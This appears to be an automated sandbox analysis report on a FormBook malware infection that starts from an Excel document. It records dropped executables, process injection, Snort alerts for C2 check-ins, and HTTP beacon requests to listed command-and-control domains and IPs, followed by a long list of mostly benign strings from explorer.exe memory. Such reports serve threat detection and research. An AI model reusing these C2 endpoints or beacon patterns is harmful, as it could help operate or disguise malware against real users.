          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop esi
          Source: global trafficDNS query: name: cdn.discordapp.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.130.233:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.130.233:443

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.land-il.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=BfKEObTbW9oeHG2CUMZ3KrmdYmDHtBO1kpWmA720me2b6REnQWjK/QX53PULeTYyqxmJdg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.fsjinhua.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.chenangopistolpermit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.streamelemeants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.mct.ltdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.bmtxm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
          Source: Joe Sandbox ViewIP Address: 81.17.18.195 81.17.18.195
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\205620C7.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.land-il.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=BfKEObTbW9oeHG2CUMZ3KrmdYmDHtBO1kpWmA720me2b6REnQWjK/QX53PULeTYyqxmJdg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.fsjinhua.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.chenangopistolpermit.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.streamelemeants.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.mct.ltdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW HTTP/1.1Host: www.bmtxm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jan 2021 06:17:46 GMTServer: nginx/1.19.5Content-Type: text/html; charset=iso-8859-1Content-Length: 315host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: acqyswhf.exe, 00000005.00000002.2173902318.0000000003647000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2182020707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: acqyswhf.exe, 00000005.00000002.2173902318.0000000003647000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2182020707.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, vbc.exe, 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
          Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2181107481.0000000001CD0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2380577544.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
